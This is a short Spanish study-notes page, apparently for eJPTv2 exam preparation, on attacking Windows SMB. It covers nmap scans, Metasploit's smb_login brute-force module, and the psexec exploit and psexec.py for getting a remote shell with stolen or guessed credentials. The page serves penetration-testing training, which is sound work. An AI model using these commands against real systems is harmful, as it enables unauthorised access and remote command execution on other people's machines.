┌─[ SMB ]────────────────────────────────────────────────────────────────────────────────────────────
│ user: Alejandro Lopez Aguilar
└ path: /en/apuntes/ejptv2/explotacion/windows/smb/

:: 🔎 Reconocimiento con NMAP

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sCV <ip>
└───────────────────────────────────────────────────────────────────────────────────────────────────

Si pone el siguiente mensaje: Message signing enabled but not required podemos usar PsExec (Nos 
permite Ejecutar comandos)

El siguiente comando nos permitirá ver el tipo de samba/smb que esta corriendo y después buscamos 
exploit respecto a la versión

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -p 445 --script smb-os-discovery <IP>
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: 🔐 Fuerza bruta con metasploit

Módulo a utilizar: auxiliary/scanner/smb/smb_login

:: ▸ PsExec con Metasploit (Recomendado)

Módulo a utilizar: exploit/windows/smb/psexec

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser <User>
set SMBPass <Password>
exploit
shell
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: ▸ PsExec

Si tenemos las credenciales y se cumple la condición mencionada arriba (Message signing enabled but 
not required) podemos usar la herramienta

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
psexec.py <user>@<IP> cmd.exe
└───────────────────────────────────────────────────────────────────────────────────────────────────

ret <volume_4>  <indice>